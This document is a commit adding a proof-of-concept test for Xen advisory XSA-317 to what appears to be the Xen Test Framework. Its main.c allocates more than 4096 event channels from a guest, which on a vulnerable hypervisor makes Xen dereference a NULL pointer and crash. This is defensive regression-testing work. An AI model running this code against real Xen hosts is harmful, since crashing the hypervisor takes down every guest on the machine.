XSA-317 PoC

Signed-off-by: Julien Grall <jgrall@amazon.com>
Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index 15eeccda21ae2f78ab7e0df622ee03014f7744bc..8eed0cf14fa7baf8262fe70156ae779860a48242 100644 (file)
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -150,6 +150,8 @@ states.
 
 @subpage test-xsa-316 - Bad error path in GNTTABOP_map_grant.
 
+@subpage test-xsa-317 - Incorrect error handling in event channel port allocation.
+
 
 @section index-utility Utilities
 

diff --git a/include/xen/event_channel.h b/include/xen/event_channel.h
index 62ee95a0188715d6348ea4c6330ab278fc1440ce..bef0f464cd08734b21ba84dee499dfbbe876874d 100644 (file)
--- a/include/xen/event_channel.h
+++ b/include/xen/event_channel.h
@@ -1,12 +1,22 @@
 #ifndef XEN_PUBLIC_EVENT_CHANNEL_H
 #define XEN_PUBLIC_EVENT_CHANNEL_H
 
+#include <xen/xen.h>
+
 #define EVTCHNOP_send             4
+#define EVTCHNOP_alloc_unbound    6
 #define EVTCHNOP_init_control    11
 #define EVTCHNOP_expand_array    12
 
 typedef uint32_t evtchn_port_t;
 
+struct evtchn_alloc_unbound {
+    /* IN parameters. */
+    domid_t dom, remote_dom;
+    /* OUT parameters. */
+    evtchn_port_t port;
+};
+
 struct evtchn_init_control {
     /* IN parameters. */
     uint64_t control_gfn;

diff --git a/include/xtf/xenbus.h b/include/xtf/xenbus.h
index 3ed77d513b670b6349a69b2c3b5cc38460dc159a..76fa7392f2d1cda592051ba2b239328498417984 100644 (file)
--- a/include/xtf/xenbus.h
+++ b/include/xtf/xenbus.h
@@ -2,6 +2,7 @@
 #define XTF_XENBUS_H
 
 #include <xtf/types.h>
+#include <xtf/compiler.h>
 #include <xen/event_channel.h>
 #include <xen/io/xs_wire.h>
 

diff --git a/tests/xsa-317/Makefile b/tests/xsa-317/Makefile
new file mode 100644 (file)
index 0000000..f930b03
--- /dev/null
+++ b/tests/xsa-317/Makefile
@@ -0,0 +1,11 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-317
+CATEGORY  := xsa
+TEST-ENVS := $(ALL_ENVIRONMENTS)
+
+TEST-EXTRA-CFG := extra.cfg.in
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk

diff --git a/tests/xsa-317/extra.cfg.in b/tests/xsa-317/extra.cfg.in
new file mode 100644 (file)
index 0000000..0cae09a
--- /dev/null
+++ b/tests/xsa-317/extra.cfg.in
@@ -0,0 +1 @@
+max_event_channels=4096

diff --git a/tests/xsa-317/main.c b/tests/xsa-317/main.c
new file mode 100644 (file)
index 0000000..8d52746
--- /dev/null
+++ b/tests/xsa-317/main.c
@@ -0,0 +1,60 @@
+/**
+ * @file tests/xsa-317/main.c
+ * @ref test-xsa-317
+ *
+ * @page test-xsa-317 XSA-317
+ *
+ * Advisory: [XSA-317](https://xenbits.xen.org/xsa/advisory-317.html)
+ *
+ * This vulnerability affects:
+ * - HVM and 32-bit PV guests allowed to use more than 1024 event channels.
+ * - 64-bit guests allowed to use more than 4096 event channels.
+ *
+ * The testcase will try to allocate more than 4096 event channels. On
+ * vulnerable platform, Xen will fall over a NULL evtchn bucket pointer.
+ *
+ * @see tests/xsa-317/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-317 PoC";
+
+void test_main(void)
+{
+    unsigned int i;
+    struct evtchn_alloc_unbound ub = {
+        .dom = DOMID_SELF,
+        .remote_dom = 0,
+    };
+
+    /*
+     * Create more event channels than the 4096 ABI limit.  A fixed Xen, or
+     * not vulnerable configuration, should fail with -ENOSPC eventually.
+     */
+    for ( i = 0; i < 4100; ++i )
+    {
+        int rc = hypercall_event_channel_op(EVTCHNOP_alloc_unbound, &ub);
+
+        if ( rc == -ENOSPC )
+            break;
+
+        if ( rc )
+            return xtf_error("Error: Unexpected alloc_unbound error %d\n", rc);
+    }
+
+    /*
+     * If Xen is still alive, it didn't fall over a NULL evtchn bucket
+     * pointer.
+     */
+    xtf_success("Success: Not vulnerable to XSA-317\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */